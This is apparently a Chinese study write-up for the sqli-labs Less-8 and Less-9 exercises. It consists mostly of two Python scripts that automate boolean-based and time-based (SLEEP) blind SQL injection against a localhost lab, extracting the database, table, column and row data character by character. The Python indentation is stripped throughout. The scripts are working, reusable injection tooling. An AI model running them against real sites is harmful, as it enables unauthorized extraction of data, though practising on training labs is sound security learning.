实验环境:
sqli-labs,小皮面板搭建,edge浏览器
apache:2.4.39,MySQL:5.7 PHP:5.39
Python(pycharm2023):3
less-8
布尔盲注:
1.我这里是采用最简单的直接采用一串字符串来查询的
import requests
url = "http://localhost:8080/Less-8/"
param = "id"
def getdatabase(url, param):
database = ""
chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_"
for i in range(1, 20):
for char in chars:
payload = f"{param}=1' AND SUBSTRING((SELECT database()), {i}, 1) = '{char}' -- "
response = requests.get(url + "?" + payload)
if "You are in..........." in response.text:
database += char
break
else:
break
return database
# 获取表名
def gettable(url, param, database):
tables = ""
chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_"
for i in range(1, 20):
for char in chars:
payload = (f"{param}=1' AND SUBSTRING((SELECT GROUP_CONCAT(table_name) "
f"FROM information_schema.tables "
f"WHERE table_schema = '{database}'), {i}, 1) = '{char}' -- ")
response = requests.get(url + "?" + payload)
if "You are in..........." in response.text:
tables += char
break
else:
break
return tables.split(',')
# 获取列名
def getcolumn(url, param, database, table):
columns = ""
chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_"
for i in range(1, 20):
for char in chars:
payload = (f"{param}=1' AND SUBSTRING((SELECT GROUP_CONCAT(column_name) "
f"FROM information_schema.columns WHERE table_schema = '{database}' "
f"AND table_name = '{table}'), {i}, 1) = '{char}' -- ")
response = requests.get(url + "?" + payload)
if "You are in..........." in response.text:
columns += char
break
else:
break
return columns.split(',')
# 获取结果
def getresult(url, param, database, table, column):
result = ""
chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_"
for i in range(1, 20):
for char in chars:
payload = (f"{param}=1' AND SUBSTRING((SELECT {column} "
f"FROM {database}.{table} LIMIT 1), {i}, 1) = '{char}' -- ")
response = requests.get(url + "?" + payload)
if "You are in..........." in response.text:
result += char
break
else:
break
return result
if __name__ == "__main__":
database = getdatabase(url, param)
print(f"Database: {database}")
tables = gettable(url, param, database)
print(f"Tables: {tables}")
table = tables[0]
columns = getcolumn(url, param, database, table)
print(f"Columns: {columns}")
column = columns[0]
result = getresult(url, param, database, table, column)
print(f"Result: {result}")
tips:我这里没有考虑有多个表和字段的情况,只是简单的把布尔盲注的原理展示了出来、
时间盲注
less-9
时间盲注:
采用时间函数,判断每个字段是否有时间差值(sleep函数)
import requests
import time
def time_based_blind_injection(url, param, payload):
start_time = time.time()
full_url = f"{url}?{param}={payload}"
response = requests.get(full_url)
end_time = time.time()
if end_time - start_time > 5:
return True
return False
def get_database(url, param):
database = ""
chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_"
for i in range(1, 20):
for char in chars:
payload = f"1' AND IF(SUBSTRING((SELECT database()), {i}, 1) = '{char}', SLEEP(7), 0) -- "
if time_based_blind_injection(url, param, payload):
database += char
print(char)
break
else:
break
print(f"[+] Database name: {database}")
return database
# 获取表名
def get_table(url, param, database):
table = ""
chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_"
for i in range(1, 20):
for char in chars:
payload = (f"1' AND IF(SUBSTRING((SELECT table_name FROM information_schema.tables "
f"WHERE table_schema='{database}' LIMIT 0,1), {i}, 1) = '{char}', SLEEP(5), 0) -- ")
if time_based_blind_injection(url, param, payload):
table += char
print(f"[+] Found character: {char}")
break
else:
break
print(f"[+] Table name: {table}")
return table
# def get_tables(url, param, database):当表不止一个
# tables = []
# chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_"
# table_count = 1 # 从第一个表开始
# while True:
# table_name = ""
# for i in range(1, 20):
# for char in chars:
# payload = (f"1' AND IF(SUBSTRING((SELECT table_name FROM information_schema.tables "
# f"WHERE table_schema='{database}' LIMIT {table_count - 1},1), {i}, 1) = '{char}', SLEEP(5), 0) -- ")
# if time_based_blind_injection(url, param, payload):
# table_name += char
# print(f"[+] table: {char}")
# break
# else:
# break
# if table_name:
# print(f"[+] Found table: {table_name}")
# tables.append(table_name)
# table_count += 1
# else:
# break
#
# return tables
# 获取字段名
def get_column(url, param, table):
column = ""
chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_"
for i in range(1, 20):
for char in chars:
payload = f"1' AND IF(SUBSTRING((SELECT column_name FROM information_schema.columns WHERE table_name='{table}' LIMIT 0,1), {i}, 1) = '{char}', SLEEP(5), 0) -- "
if time_based_blind_injection(url, param, payload):
column += char
print(f"[+] column: {char}")
break
else:
break
print(f"[+] Column name: {column}")
return column
def get_data(url, param, table, column):
data = ""
chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_"
for i in range(1, 20):
for char in chars:
payload = f"1' AND IF(SUBSTRING((SELECT {column} FROM {table} LIMIT 0,1), {i}, 1) = '{char}', SLEEP(5), 0) -- "
if time_based_blind_injection(url, param, payload):
data += char
print(f"[+] Found character: {char}")
break
else:
break
print(f"[+] Data: {data}")
return data
# 主函数
if __name__ == "__main__":
target_url = "http://localhost:8080/Less-9/"
param = "id"
database = get_database(target_url, param)
if database:
table = get_table(target_url, param, database)
if table:
column = get_column(target_url, param, table)
if column:
get_data(target_url, param, table, column)
同样没有考虑不止一个表或者列的情况